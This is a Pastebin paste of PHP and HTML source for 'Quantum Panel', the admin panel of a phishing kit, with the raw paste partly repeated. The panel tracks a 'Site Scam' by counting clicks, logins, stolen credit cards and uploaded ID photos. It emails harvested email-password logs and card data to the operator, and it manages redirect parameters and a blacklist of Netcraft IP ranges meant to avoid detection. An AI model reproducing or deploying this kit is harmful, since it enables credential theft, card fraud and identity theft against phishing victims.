Advertisement
jeant2234

Untitled

May 10th, 2018
239
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 45.78 KB | None | 0 0
  1. <?php
  2.  
  3. include 'conf/config.php';
  4. @require_once "setting.php";
  5. session_start();
  6. if($_SESSION['user'] == ""){
  7. header('location:bs.php');
  8. }
  9. $off = $_GET['account'];
  10. if(isset($off)){
  11. if($off == 'off'){
  12. session_destroy();
  13. unset($_SESSION['user']);
  14. session_unset();
  15. header('location:bs.php');
  16. }
  17. else{
  18. echo '';
  19. }
  20. }
  21.  
  22. ?>
  23.  
  24. <html>
  25. <head>
  26. <title>Panel</title>
  27. <style type="text/css">
  28. input[type=submit],input[type=reset] {
  29. width: 27%;
  30. border-radius: 5px;
  31. background: #f0f0f0;
  32. padding: 3px;
  33. }
  34. </style>
  35. </head>
  36. <body bgcolor="#f0f0f0">
  37. <div id="bukak">
  38. <a style="text-decoration:none; background-color: #0070c9; background: linear-gradient(#42a1ec, #0070c9); color: white; border-radius: 5px; padding: 3px 7px;" href="https://<?php echo $_SERVER['SERVER_NAME']."/".$param;?>" target="_blank">View Scam</a>
  39. <a href="?account=off"><button class="peler">Log Out</button></a>
  40. <div class="form-group">
  41. <label for="inputEmail" class="col-lg-2 control-label"></label>
  42. <div class="col-lg-10">
  43. TOKEN ACTIVE : <br><input class="form-control" readonly="true" name="lama" value="<?php echo $password; ?>" type="text">
  44. <link rel="SHORTCUT ICON" href="http://cdn.mysitemyway.com/etc-mysitemyway/icons/legacy-previews/icons/glowing-purple-neon-icons-alphanumeric/112654-glowing-purple-neon-icon-alphanumeric-letter-tt.png"/>
  45. <style type='text/css'>
  46. body {background-color:#1b1b1b; color:#CCCCCC; font-family: 'Courier New', Courier, monospace; font-size: 10pt; padding:5px;}
  47. h2 {margin-bottom: 12px;}
  48.  
  49. a, a:active {text-decoration: none; color:#009E99;}
  50. a:visited {color: #007070;}
  51. a:hover, a:focus {text-decoration: none; color:#CCCCCC;}
  52. a img {border:none;}
  53.  
  54. table { }
  55. th, td { text-align:left; }
  56. th { font-weight: bold; padding-right: 14px; padding-bottom: 3px;}
  57. td {padding-right: 14px;}
  58. td.s, th.s {text-align: right;}
  59. </style>
  60. </head>
  61.  
  62. <body>
  63. <style>
  64. }
  65. .klik,.alat {
  66. text-align: center;
  67. padding: 5px 11px;
  68. background: black;
  69. font-weight: bold;
  70. font-family: sans-serif;
  71. letter-spacing: 1px;
  72. word-spacing: 1px;
  73. font-size: 13px;
  74. color:#00FF00;
  75. margin: 0px 5px 10px;
  76. display: inline;
  77. border-radius: 5px;
  78. }
  79. h1 {
  80. color: #19abff;
  81. font-size: 40px;
  82. margin: 1px auto;
  83. text-align:center;
  84. text-transform:uppercase;
  85. }
  86. .neon {
  87. color: #FFFFFF;
  88. text-shadow: 0 0 5px #19abff, 0 0 10px #19abff, 0 0 20px #19abff, 0 0 45px #19abff, 0 0 40px #19abff;
  89. }
  90. </style>
  91. <script language="JavaScript1.2">
  92. function ClearError() {return true;}
  93. window.onerror = ClearError;
  94. </script>
  95. <script>
  96. window.onload = function() {
  97. var h1 = document.getElementsByTagName("h1")[0],
  98. text = h1.innerText || h1.textContent,
  99. split = [], i, lit = 0, timer = null;
  100. for(i = 0; i < text.length; ++i) {
  101. split.push("<span>" + text[i] + "</span>");
  102. }
  103. h1.innerHTML = split.join("");
  104. split = h1.childNodes;
  105.  
  106. var flicker = function() {
  107. lit += 0.01;
  108. if(lit >= 1) {
  109. clearInterval(timer);
  110. }
  111. for(i = 0; i < split.length; ++i) {
  112. if(Math.random() < lit) {
  113. split[i].className = "neon";
  114. } else {
  115. split[i].className = "";
  116. }
  117. }
  118. }
  119. setInterval(flicker, 100);
  120. }
  121. </script>
  122. <br><br>
  123. <h1>Quantum PANEL </h1>
  124. <br>
  125. <center>
  126. If you need any help contact <a href="resultjeancc@yandex.com" >email@Quantum.club</a> or contact fb #help
  127. </pre>
  128. <center>
  129. <br>
  130. <a class="navbar-brand" href="#">Quantum Panel V.0.1</a>
  131. <pre>
  132. <script language="JavaScript1.2">
  133. var message="N e w . U p d a t e . Quantunm. V e r s i o n "
  134. var neonbasecolor="#F44336"
  135. var neontextcolor="white"
  136. var neontextcolor2="lime"
  137. var neontexsize="8"
  138. var flashspeed=50
  139. var flashingletters=2
  140. var flashingletters2=15
  141. var flashpause=0
  142. ///No need to edit below this line/////
  143. var n=0
  144. if (document.all||document.getElementById){
  145. document.write('<b>')
  146. document.write('<font color="'+neonbasecolor+neontexsize+'">')
  147. for (m=0;m<message.length;m++)
  148. document.write('<span id="neonlight'+m+'">'+message.charAt(m)+'</span>')
  149. document.write('</font>')
  150. document.write('</b>')
  151. }
  152. else
  153. document.write(message)
  154. function crossref(number){
  155. var crossobj=document.all? eval("document.all.neonlight"+number) : document.getElementById("neonlight"+number)
  156. return crossobj
  157. }
  158. function neon(){
  159. //Change all letters to base color
  160. if (n==0){
  161. for (m=0;m<message.length;m++)
  162. crossref(m).style.color=neonbasecolor
  163. }
  164. //cycle through and change individual letters to neon color
  165. crossref(n).style.color=neontextcolor
  166. if (n>flashingletters-1) crossref(n-flashingletters).style.color=neontextcolor2
  167. if (n>(flashingletters+flashingletters2)-1) crossref(n-flashingletters-flashingletters2).style.color=neonbasecolor
  168. if (n<message.length-1)
  169. n++
  170. else{
  171. n=0
  172. clearInterval(flashing)
  173. setTimeout("beginneon()",flashpause)
  174. return
  175. }
  176. }
  177. function beginneon(){
  178. if (document.all||document.getElementById)
  179. flashing=setInterval("neon()",flashspeed)
  180. }
  181. beginneon()
  182. </script>
  183. </center><html>
  184. <style>
  185.  
  186. h1 {font-size:2em;}
  187. .peler1{background:black; color:blue; border:1px solid blue; border-radius:6px; margin:4px; padding:8px;}
  188. .peler1:hover{background:blue; color:black;}
  189. .peler{background:black; color:red; border:1px solid red; border-radius:2px; margin:2px; padding:6px;}
  190. .peler:hover{background:red; color:black;}
  191. .but{background:black; color:#00FF00; border:1px solid green; border-radius:6px; margin:4px; padding:8px;}
  192. .but:hover{background:#00FF00; color:black;}
  193. .clc{
  194. background:black;
  195. border:none;
  196. border-radius:5px;
  197. color:#00FF00;
  198. font-weight:bold;
  199. padding:5px;
  200.  
  201. margin:7px;
  202. }
  203.  
  204. </style>
  205. </head>
  206.  
  207.  
  208. <div>
  209.  
  210.  
  211.  
  212.  
  213. </div>
  214. <br>
  215.  
  216. <form class="navbar-form navbar-right" role="search" action="#" method="post">
  217. <div class="form-group">
  218. <form method="POST">
  219. <label for="inputEmail" class="col-lg-2 control-label"> </label>
  220. <div class="col-lg-10">
  221. Email Lama : <input class="form-control" name="baru" value="" placeholder="email@example.com" type="text">
  222. </div>
  223. </div>
  224. <br>
  225. <div class="form-group">
  226. <label for="inputEmail" class="col-lg-2 control-label"></label>
  227. <div class="col-lg-10">
  228. Email Baru : <input class="form-control" readonly="true" name="lama" value="<?php echo $Your_Email; ?>" type="text">
  229. </div>
  230. </div>
  231. <br>
  232. <input type="submit" class="btn btn-primary" name="email" value="Ganti Email Result"></input>
  233.  
  234.  
  235. <br>
  236.  
  237. </li>
  238. </ul>
  239. </div>
  240. </div>
  241. </nav>
  242. <div class="container">
  243. <div class="row">
  244. <div class="col-lg-6">
  245. <div class="well">
  246. <fieldset>
  247. <center>
  248. <center><font color ="blue">* Mode * </font></center><br>
  249. <center><font color ="yellow">* Wajib Tanya Jika Belum Paham " !!</font></center><br>
  250. <form method="POST" class="form-horizontal">
  251. <div class="form-group">
  252. <label for="inputEmail" class="col-lg-2 control-label">True Login</label>
  253. <div class="col-lg-10">
  254. <input class="col-lg-5 control-label" type="text" readonly="true" name="tll" value="<?php echo $t_login; ?>"></input>
  255. <input class="col-lg-5 control-label" type="text" name="tlb" placeholder="True Login"></input>
  256. <input type="submit" class="btn btn-primary control-label" name="tls" value="Save"></input>
  257. </div>
  258. </div>
  259.  
  260.  
  261. </form>
  262. <form method="POST" class="form-horizontal">
  263. <div class="form-group">
  264. <label for="inputEmail" class="col-lg-2 control-label">Panel</label>
  265. <div class="col-lg-10">
  266. <input class="col-lg-5 control-label" type="text" readonly="true" name="keylama" value="<?php echo $panel; ?>"></input>
  267. <input class="col-lg-5 control-label" type="text" name="keybaru" placeholder="Profile Script"></input>
  268. <input type="submit" class="btn btn-primary control-label" name="key" value="Save"></input>
  269. </div>
  270. </div>
  271.  
  272.  
  273. </form>
  274. <form method="POST" class="form-horizontal">
  275. <div class="form-group">
  276. <label for="inputEmail" class="col-lg-2 control-label">Site Scam</label>
  277. <div class="col-lg-10">
  278. <input class="col-lg-5 control-label" type="text" readonly="true" name="parla" value="<?php echo $param; ?>"></input>
  279. <input class="col-lg-5 control-label" type="text" name="parba" placeholder="ParameterSite"></input>
  280. <input type="submit" class="btn btn-primary control-label" name="param" value="Save"></input>
  281. </div>
  282. </div>
  283.  
  284.  
  285. </form>
  286. <form method="POST" class="form-horizontal">
  287. <div class="form-group">
  288. <label for="inputEmail" class="col-lg-2 control-label">User Agent</label>
  289. <div class="col-lg-10">
  290. <input class="col-lg-5 control-label" type="text" readonly="true" name="ual" value="<?php echo $user_allow; ?>"></input>
  291. <input class="col-lg-5 control-label" type="text" name="uab" placeholder="true / false"></input>
  292. <input type="submit" class="btn btn-primary control-label" name="usas" value="Save"></input>
  293. </div>
  294. </div>
  295.  
  296.  
  297. </form>
  298.  
  299. <form method="POST" class="form-horizontal">
  300. <div class="form-group">
  301. <label for="inputEmail" class="col-lg-2 control-label">One Time Access</label>
  302. <div class="col-lg-10">
  303. <input class="col-lg-5 control-label" type="text" readonly="true" name="otal" value="<?php echo $One_Time_Access; ?>"></input>
  304. <input class="col-lg-5 control-label" type="text" name="otab" placeholder="block / non"></input>
  305. <input type="submit" class="btn btn-primary control-label" name="otas" value="Save"></input>
  306. <br>
  307. <center><br>
  308. <form method="POST">
  309. <div class="klik">Click : <font color="blue"><?php echo empty(@file_get_contents("assets/logs/._click_.txt")) ? "0" : @file_get_contents("assets/logs/._click_.txt"); ?></font></div>
  310.  
  311. <div class="klik">Login : <font color="orange"><?php echo empty(@file_get_contents("assets/logs/._login_.txt")) ? "0" : @file_get_contents("assets/logs/._login_.txt"); ?></font></div>
  312.  
  313. <div class="klik">Credit Card : <font color="yellow"><?php echo empty(@file_get_contents("creditcard.txt")) ? "0" : @file_get_contents("creditcard.txt"); ?></font></div>
  314.  
  315. <div class="klik">Upluad ID : <font color="red"><?php echo empty(@file_get_contents("poto.txt")) ? "0" : @file_get_contents("poto.txt"); ?></font></div>
  316. </form>
  317. </div>
  318. </div>
  319.  
  320.  
  321.  
  322. </div>
  323.  
  324. </div>
  325. <?php
  326. @unlink("set.php");
  327.  
  328. $lama = trim(@$_POST['lama']);
  329. $baru = trim(@$_POST['baru']);
  330. $keylama = trim(@$_POST['keylama']);
  331. $keybaru = trim(@$_POST['keybaru']);
  332. $parla = trim(@$_POST['parla']);
  333. $parba = trim(@$_POST['parba']);
  334. $ual = trim(@$_POST['ual']);
  335. $uab = trim(@$_POST['uab']);
  336. $tll = trim(@$_POST['tll']);
  337. $tlb = trim(@$_POST['tlb']);
  338. $otal = trim(@$_POST['otal']);
  339. $otab = trim(@$_POST['otab']);
  340. $file = "setting.php";
  341. $isi = @file_get_contents($file);
  342.  
  343. if(isset($_POST['email'])) {
  344. if(@preg_match("#\b$lama\b#is", $isi)) {
  345. $isi = str_replace($lama,$baru,$isi);
  346. $buka = @fopen($file,'w');
  347. @fwrite($buka,$isi);
  348. fclose($buka);
  349.  
  350. echo "<script>alert('Success')</script>";
  351. echo "<meta http-equiv='refresh' content='0; url=#ganti_email'/>";
  352. }
  353. else
  354. echo "<script>alert('Failed')</script>";
  355. }
  356. else if(isset($_POST['key'])) {
  357. if(@preg_match("#\b$keylama\b#is", $isi)) {
  358. $isi = str_replace($keylama,$keybaru,$isi);
  359. $buka = @fopen($file,'w');
  360. @fwrite($buka,$isi);
  361. fclose($buka);
  362.  
  363. echo "<script>alert('Success')</script>";
  364.  
  365. }
  366. else
  367. echo "<script>alert('Failed')</script>";
  368. }else if(isset($_POST['usas'])) {
  369. if(@preg_match("#$ual#is", $isi)) {
  370. $isi = str_replace($ual,$uab,$isi);
  371. $buka = @fopen($file,'w');
  372. @fwrite($buka,$isi);
  373. fclose($buka);
  374. echo "<script>alert('Success')</script>";
  375. echo "<meta http-equiv='refresh' content='0; url=#change_userallow'/>";
  376. echo "<meta http-equiv='refresh' content='0; url=#change_userallow'/>";
  377. }
  378. else
  379. echo "<script>alert('Failed')</script>";
  380. }else if(isset($_POST['param'])) {
  381. if(@preg_match("#param = \"$parla\"#is", $isi)) {
  382. $isi = str_replace("$parla\"; // Parameter Redirect","$parba\"; // Parameter Redirect",$isi);
  383. $buka = @fopen($file,'w');
  384. @fwrite($buka,$isi);
  385. fclose($buka);
  386.  
  387. @rename($parla.".php",$parba.".php");
  388.  
  389. echo "<script>alert('Success')</script>";
  390. echo "<meta http-equiv='refresh' content='0; url=#ganti_parameter'/>";
  391. echo "<meta http-equiv='refresh' content='0; url=#ganti_parameter'/>";
  392. }
  393. else
  394. echo "<script>alert('Failed')</script>";
  395. }else if(isset($_POST['tls'])) {
  396. if(@preg_match("#$tll#is", $isi)) {
  397. $isi = str_replace($tll,$tlb,$isi);
  398. $buka = @fopen($file,'w');
  399. @fwrite($buka,$isi);
  400. fclose($buka);
  401. echo "<script>alert('Success')</script>";
  402. echo "<meta http-equiv='refresh' content='0; url=#change_truelogin'/>";
  403. echo "<meta http-equiv='refresh' content='0; url=#change_truelogin'/>";
  404. }
  405. else
  406. echo "<script>alert('Failed')</script>";
  407. }else if(isset($_POST['otas'])) {
  408. if(@preg_match("#$otal#is", $isi)) {
  409. $isi = str_replace($otal,$otab,$isi);
  410. $buka = @fopen($file,'w');
  411. @fwrite($buka,$isi);
  412. fclose($buka);
  413. echo "<script>alert('Success')</script>";
  414. echo "<meta http-equiv='refresh' content='0; url=#change_OneTimeAccess'/>";
  415. echo "<meta http-equiv='refresh' content='0; url=#change_OneTimeAccess'/>";
  416. }
  417. else
  418. echo "<script>alert('Failed')</script>";
  419. }
  420. else if(isset($_POST['rd'])) {
  421. @unlink("._no_.txt");
  422. @unlink("._nob_.txt");
  423. @unlink("assets/logs/._click_.txt");
  424. @unlink("assets/logs/._loginz_.txt");
  425. @unlink("assets/logs/._ccz_.txt");
  426. @unlink("._logz_.txt");
  427. @unlink("assets/logs/bxp.log");
  428. @unlink("assets/logs/bin.log");
  429. @unlink("error_log");
  430. @unlink("._ssid.txt");
  431. // @unlink("assets/includes/blacklist.dat");
  432. @unlink("assets/logs/accepted_visitors.txt");
  433. @unlink("assets/logs/ip2_log.txt");
  434. @unlink("assets/logs/denied_visitors.txt");
  435. @unlink("assets/logs/visitor_logged_in.txt");
  436.  
  437. $filee = @file_get_contents("assets/includes/blacklist.dat");
  438. $cek = preg_match_all("/# NETCRAFT IP RANGES(.*)# USERS COMPLETED/is", $filee, $res) ? $res : null;
  439. $buka = @fopen("assets/includes/blacklist.dat",'w');
  440. @fwrite($buka,$cek[0][0]."\r\r");
  441. @fclose($buka);
  442.  
  443. echo "<script>alert('Success')</script>";
  444. echo "<meta http-equiv='refresh' content='0; url=#reset_data'/>";
  445. }
  446. else if(isset($_POST['sd'])) {
  447. $empass = @file_get_contents("assets/logs/bxp.log");
  448. $total = substr_count($empass,"@");
  449.  
  450. if($total <= 0)
  451. {
  452. echo '<script>alert("Failed\n\Email And Password Not Found.")</script>';
  453. }
  454. else
  455. {
  456. $fil = "._no_.txt";
  457. $last = (@file_get_contents($fil) == "" ? "1" : @file_get_contents($fil));
  458. $urut = fopen($fil,"w");
  459. fwrite($urut,$last+1);
  460. fclose($urut);
  461.  
  462. $headers = "From: Empas Apel <empas@Quantum-panel.team>\r\n";
  463. $headers .= "Reply-to: Quantum-panel@team\r\n";
  464. $headers .= "MIME-Version: 1.0\r\n";
  465. $headers .= "Content-Type: text/plain; charset=UTF-8\r\n";
  466. $subj = "[ Empas #$last ] [ Total $total Lines ] [ ".date("D, d-F-y H:i")." ]";
  467. $to = $Your_Email;
  468. $data = "-===================== Quantum PANEL SCRIPT =====================-
  469.  
  470. -----------------------------------------------------------------
  471. $empass
  472. -----------------------------------------------------------------";
  473.  
  474. @mail($to, $subj, $data, $headers);
  475.  
  476. echo "<script>alert('Success')</script>";
  477. echo "<meta http-equiv='refresh' content='0; url=#send_empas'/>";
  478. }
  479. }
  480. else if(isset($_POST['sb'])) {
  481. $binbin = @file_get_contents("asset/logs/bin.log");
  482. $total = substr_count($binbin,"[");
  483.  
  484. if($total <= 0)
  485. {
  486. echo '<script>alert("Failed~\n\nBIN Not Found.")</script>';
  487. }
  488. else
  489. {
  490. $fil = "._nob_.txt";
  491. $last = (@file_get_contents($fil) == "" ? "1" : @file_get_contents($fil));
  492. $urut = fopen($fil,"w");
  493. fwrite($urut,$last+1);
  494. fclose($urut);
  495.  
  496. $headers = "From: Bin Colletions <bin@Quantum-panel.team>\r\n";
  497. $headers .= "Reply-to: Quantum@panel.team\r\n";
  498. $headers .= "MIME-Version: 1.0\r\n";
  499. $headers .= "Content-Type: text/plain; charset=UTF-8\r\n";
  500. $subj = "[ Bin #$last ] [ Total $total Cards ] [ ".date("D, d-F-y H:i")." ]";
  501. $to = $Your_Email;
  502. $data = "-===================== Quantum PANEL SCRIPT =====================-
  503.  
  504. -----------------------------------------------------------------
  505. $binbin
  506. -----------------------------------------------------------------";
  507.  
  508. @mail($to, $subj, $data, $headers);
  509.  
  510. echo "<script>alert('Success')</script>";
  511. echo "<meta http-equiv='refresh' content='0; url=#send_bin'/>";
  512. }
  513. }
  514. else if(isset($_POST['sl'])) {
  515. $fil2 = "._logz_.txt";
  516. $lasts = (@file_get_contents($fil2) == "" ? "1" : @file_get_contents($fil2));
  517. $urut = fopen($fil2,"w");
  518. fwrite($urut,$lasts+1);
  519. fclose($urut);
  520.  
  521. $headers = "From: Quantum PANEL SCRIPT Report <report@Quantum-panel.TEAM>\r\n";
  522. $headers .= "Reply-to: Quantum@panel.team\r\n";
  523. $headers .= "MIME-Version: 1.0\r\n";
  524. $headers .= "Content-Type: text/plain; charset=UTF-8\r\n";
  525. $subj = "[ Report #$lasts ] [ BOrneo-RSJ KING TEAM ] [ ".date("D, d-F-y H:i")." ]";
  526. $to = $Your_Email;
  527. $tor = $tglorder;
  528. $tcl = (@file_get_contents("assets/logs/._click_.txt") == "" ? "0" : @file_get_contents("assets/logs/._click_.txt"));
  529. $tlo = (@file_get_contents("assets/logs/._loginz_.txt") == "" ? "0" : @file_get_contents("assets/logs/._loginz_.txt"));
  530. $tcc = (@file_get_contents("assets/logs/._ccz_.txt") == "" ? "0" : @file_get_contents("assets/logs/._ccz_.txt"));
  531. $tlh = substr_count(@file_get_contents("._ssid.txt")," ");
  532. $det = array("u" => $_SERVER['SERVER_NAME'],"p" => $_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"],"m" => $umurlog,"tc" => $tcl,"tl" => $tlo,"tcc" => $tcc,"lh" => $tlh);
  533. $data = "
  534. -===================== Quantum PANEL SCRIPT =====================-
  535. # Domen Scam : ".$det['u']."
  536. # Panel Scam : ".$det['p']."
  537. # Umur Scam : ".$det['m']." hari
  538. # Tanggal Order : ".$tor."
  539. # Total Load : ".$det['lh']."
  540. # Total Klik : ".$det['tc']."
  541. # Total Login : ".$det['tl']."
  542. # Total Card : ".$det['tcc']."
  543. -===================== Quantum PANEL SCRIPT =====================-";
  544.  
  545. @mail($to, $subj, $data, $headers);
  546.  
  547. echo "<script>alert('Success')</script>";
  548. echo "<meta http-equiv='refresh' content='0; url=#send_report'/>";
  549. }
  550. ?>
  551. <div class="row tall-row">
  552. <div class="col-md-12">
  553. <p>Created by <a https://www.facebook.com/jean.tirstan.3">JEAN TIRSTAN</a> &copy; 2018</p>
  554. </div>
  555. </div>
  556. <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.2/jquery.min.js"></script>
  557. <script src="//maxcdn.bootstrapcdn.com/bootstrap/3.3.4/js/bootstrap.min.js"></script>
  558.  
  559. </body>
  560. </html>
  561.  
  562.  
  563.  
  564.  
  565.  
  566. </body>
  567. </html>
  568. RAW Paste Data
  569.  
  570. <?php
  571.  
  572. include 'conf/config.php';
  573. @require_once "setting.php";
  574. session_start();
  575. if($_SESSION['user'] == ""){
  576. header('location:bs.php');
  577. }
  578. $off = $_GET['account'];
  579. if(isset($off)){
  580. if($off == 'off'){
  581. session_destroy();
  582. unset($_SESSION['user']);
  583. session_unset();
  584. header('location:bs.php');
  585. }
  586. else{
  587. echo '';
  588. }
  589. }
  590.  
  591. ?>
  592.  
  593. <html>
  594. <head>
  595. <title>Panel</title>
  596. <style type="text/css">
  597. input[type=submit],input[type=reset] {
  598. width: 27%;
  599. border-radius: 5px;
  600. background: #f0f0f0;
  601. padding: 3px;
  602. }
  603. </style>
  604. </head>
  605. <body bgcolor="#f0f0f0">
  606. <div id="bukak">
  607. <a style="text-decoration:none; background-color: #0070c9; background: linear-gradient(#42a1ec, #0070c9); color: white; border-radius: 5px; padding: 3px 7px;" href="https://<?php echo $_SERVER['SERVER_NAME']."/".$param;?>" target="_blank">View Scam</a>
  608. <a href="?account=off"><button class="peler">Log Out</button></a>
  609. <div class="form-group">
  610. <label for="inputEmail" class="col-lg-2 control-label"></label>
  611. <div class="col-lg-10">
  612. TOKEN ACTIVE : <br><input class="form-control" readonly="true" name="lama" value="<?php echo $password; ?>" type="text">
  613. <link rel="SHORTCUT ICON" href="http://cdn.mysitemyway.com/etc-mysitemyway/icons/legacy-previews/icons/glowing-purple-neon-icons-alphanumeric/112654-glowing-purple-neon-icon-alphanumeric-letter-tt.png"/>
  614. <style type='text/css'>
  615. body {background-color:#1b1b1b; color:#CCCCCC; font-family: 'Courier New', Courier, monospace; font-size: 10pt; padding:5px;}
  616. h2 {margin-bottom: 12px;}
  617.  
  618. a, a:active {text-decoration: none; color:#009E99;}
  619. a:visited {color: #007070;}
  620. a:hover, a:focus {text-decoration: none; color:#CCCCCC;}
  621. a img {border:none;}
  622.  
  623. table { }
  624. th, td { text-align:left; }
  625. th { font-weight: bold; padding-right: 14px; padding-bottom: 3px;}
  626. td {padding-right: 14px;}
  627. td.s, th.s {text-align: right;}
  628. </style>
  629. </head>
  630.  
  631. <body>
  632. <style>
  633. }
  634. .klik,.alat {
  635. text-align: center;
  636. padding: 5px 11px;
  637. background: black;
  638. font-weight: bold;
  639. font-family: sans-serif;
  640. letter-spacing: 1px;
  641. word-spacing: 1px;
  642. font-size: 13px;
  643. color:#00FF00;
  644. margin: 0px 5px 10px;
  645. display: inline;
  646. border-radius: 5px;
  647. }
  648. h1 {
  649. color: #19abff;
  650. font-size: 40px;
  651. margin: 1px auto;
  652. text-align:center;
  653. text-transform:uppercase;
  654. }
  655. .neon {
  656. color: #FFFFFF;
  657. text-shadow: 0 0 5px #19abff, 0 0 10px #19abff, 0 0 20px #19abff, 0 0 45px #19abff, 0 0 40px #19abff;
  658. }
  659. </style>
  660. <script language="JavaScript1.2">
  661. function ClearError() {return true;}
  662. window.onerror = ClearError;
  663. </script>
  664. <script>
  665. window.onload = function() {
  666. var h1 = document.getElementsByTagName("h1")[0],
  667. text = h1.innerText || h1.textContent,
  668. split = [], i, lit = 0, timer = null;
  669. for(i = 0; i < text.length; ++i) {
  670. split.push("<span>" + text[i] + "</span>");
  671. }
  672. h1.innerHTML = split.join("");
  673. split = h1.childNodes;
  674.  
  675. var flicker = function() {
  676. lit += 0.01;
  677. if(lit >= 1) {
  678. clearInterval(timer);
  679. }
  680. for(i = 0; i < split.length; ++i) {
  681. if(Math.random() < lit) {
  682. split[i].className = "neon";
  683. } else {
  684. split[i].className = "";
  685. }
  686. }
  687. }
  688. setInterval(flicker, 100);
  689. }
  690. </script>
  691. <br><br>
  692. <h1>Quantum Panel </h1>
  693. <br>
  694. <center>
  695. If you need any help contact <a href="resultjeancc@yandex.com" >email@Quantum.club</a> or contact fb #help
  696. </pre>
  697. <center>
  698. <br>
  699. <a class="navbar-brand" href="#">Quantum Panel V.0.1</a>
  700. <pre>
  701. <script language="JavaScript1.2">
  702. var message="N e w . U p d a t e . Quantum. V e r s i o n "
  703. var neonbasecolor="#F44336"
  704. var neontextcolor="white"
  705. var neontextcolor2="lime"
  706. var neontexsize="8"
  707. var flashspeed=50
  708. var flashingletters=2
  709. var flashingletters2=15
  710. var flashpause=0
  711. ///No need to edit below this line/////
  712. var n=0
  713. if (document.all||document.getElementById){
  714. document.write('<b>')
  715. document.write('<font color="'+neonbasecolor+neontexsize+'">')
  716. for (m=0;m<message.length;m++)
  717. document.write('<span id="neonlight'+m+'">'+message.charAt(m)+'</span>')
  718. document.write('</font>')
  719. document.write('</b>')
  720. }
  721. else
  722. document.write(message)
  723. function crossref(number){
  724. var crossobj=document.all? eval("document.all.neonlight"+number) : document.getElementById("neonlight"+number)
  725. return crossobj
  726. }
  727. function neon(){
  728. //Change all letters to base color
  729. if (n==0){
  730. for (m=0;m<message.length;m++)
  731. crossref(m).style.color=neonbasecolor
  732. }
  733. //cycle through and change individual letters to neon color
  734. crossref(n).style.color=neontextcolor
  735. if (n>flashingletters-1) crossref(n-flashingletters).style.color=neontextcolor2
  736. if (n>(flashingletters+flashingletters2)-1) crossref(n-flashingletters-flashingletters2).style.color=neonbasecolor
  737. if (n<message.length-1)
  738. n++
  739. else{
  740. n=0
  741. clearInterval(flashing)
  742. setTimeout("beginneon()",flashpause)
  743. return
  744. }
  745. }
  746. function beginneon(){
  747. if (document.all||document.getElementById)
  748. flashing=setInterval("neon()",flashspeed)
  749. }
  750. beginneon()
  751. </script>
  752. </center><html>
  753. <style>
  754.  
  755. h1 {font-size:2em;}
  756. .peler1{background:black; color:blue; border:1px solid blue; border-radius:6px; margin:4px; padding:8px;}
  757. .peler1:hover{background:blue; color:black;}
  758. .peler{background:black; color:red; border:1px solid red; border-radius:2px; margin:2px; padding:6px;}
  759. .peler:hover{background:red; color:black;}
  760. .but{background:black; color:#00FF00; border:1px solid green; border-radius:6px; margin:4px; padding:8px;}
  761. .but:hover{background:#00FF00; color:black;}
  762. .clc{
  763. background:black;
  764. border:none;
  765. border-radius:5px;
  766. color:#00FF00;
  767. font-weight:bold;
  768. padding:5px;
  769.  
  770. margin:7px;
  771. }
  772.  
  773. </style>
  774. </head>
  775.  
  776.  
  777. <div>
  778.  
  779.  
  780.  
  781.  
  782. </div>
  783. <br>
  784.  
  785. <form class="navbar-form navbar-right" role="search" action="#" method="post">
  786. <div class="form-group">
  787. <form method="POST">
  788. <label for="inputEmail" class="col-lg-2 control-label"> </label>
  789. <div class="col-lg-10">
  790. Email Lama : <input class="form-control" name="baru" value="" placeholder="email@example.com" type="text">
  791. </div>
  792. </div>
  793. <br>
  794. <div class="form-group">
  795. <label for="inputEmail" class="col-lg-2 control-label"></label>
  796. <div class="col-lg-10">
  797. Email Baru : <input class="form-control" readonly="true" name="lama" value="<?php echo $Your_Email; ?>" type="text">
  798. </div>
  799. </div>
  800. <br>
  801. <input type="submit" class="btn btn-primary" name="email" value="Ganti Email Result"></input>
  802.  
  803.  
  804. <br>
  805.  
  806. </li>
  807. </ul>
  808. </div>
  809. </div>
  810. </nav>
  811. <div class="container">
  812. <div class="row">
  813. <div class="col-lg-6">
  814. <div class="well">
  815. <fieldset>
  816. <center>
  817. <center><font color ="blue">* Mode * </font></center><br>
  818. <center><font color ="yellow">* Wajib Tanya Jika Belum Paham " !!</font></center><br>
  819. <form method="POST" class="form-horizontal">
  820. <div class="form-group">
  821. <label for="inputEmail" class="col-lg-2 control-label">True Login</label>
  822. <div class="col-lg-10">
  823. <input class="col-lg-5 control-label" type="text" readonly="true" name="tll" value="<?php echo $t_login; ?>"></input>
  824. <input class="col-lg-5 control-label" type="text" name="tlb" placeholder="True Login"></input>
  825. <input type="submit" class="btn btn-primary control-label" name="tls" value="Save"></input>
  826. </div>
  827. </div>
  828.  
  829.  
  830. </form>
  831. <form method="POST" class="form-horizontal">
  832. <div class="form-group">
  833. <label for="inputEmail" class="col-lg-2 control-label">Panel</label>
  834. <div class="col-lg-10">
  835. <input class="col-lg-5 control-label" type="text" readonly="true" name="keylama" value="<?php echo $panel; ?>"></input>
  836. <input class="col-lg-5 control-label" type="text" name="keybaru" placeholder="Profile Script"></input>
  837. <input type="submit" class="btn btn-primary control-label" name="key" value="Save"></input>
  838. </div>
  839. </div>
  840.  
  841.  
  842. </form>
  843. <form method="POST" class="form-horizontal">
  844. <div class="form-group">
  845. <label for="inputEmail" class="col-lg-2 control-label">Site Scam</label>
  846. <div class="col-lg-10">
  847. <input class="col-lg-5 control-label" type="text" readonly="true" name="parla" value="<?php echo $param; ?>"></input>
  848. <input class="col-lg-5 control-label" type="text" name="parba" placeholder="ParameterSite"></input>
  849. <input type="submit" class="btn btn-primary control-label" name="param" value="Save"></input>
  850. </div>
  851. </div>
  852.  
  853.  
  854. </form>
  855. <form method="POST" class="form-horizontal">
  856. <div class="form-group">
  857. <label for="inputEmail" class="col-lg-2 control-label">User Agent</label>
  858. <div class="col-lg-10">
  859. <input class="col-lg-5 control-label" type="text" readonly="true" name="ual" value="<?php echo $user_allow; ?>"></input>
  860. <input class="col-lg-5 control-label" type="text" name="uab" placeholder="true / false"></input>
  861. <input type="submit" class="btn btn-primary control-label" name="usas" value="Save"></input>
  862. </div>
  863. </div>
  864.  
  865.  
  866. </form>
  867.  
  868. <form method="POST" class="form-horizontal">
  869. <div class="form-group">
  870. <label for="inputEmail" class="col-lg-2 control-label">One Time Access</label>
  871. <div class="col-lg-10">
  872. <input class="col-lg-5 control-label" type="text" readonly="true" name="otal" value="<?php echo $One_Time_Access; ?>"></input>
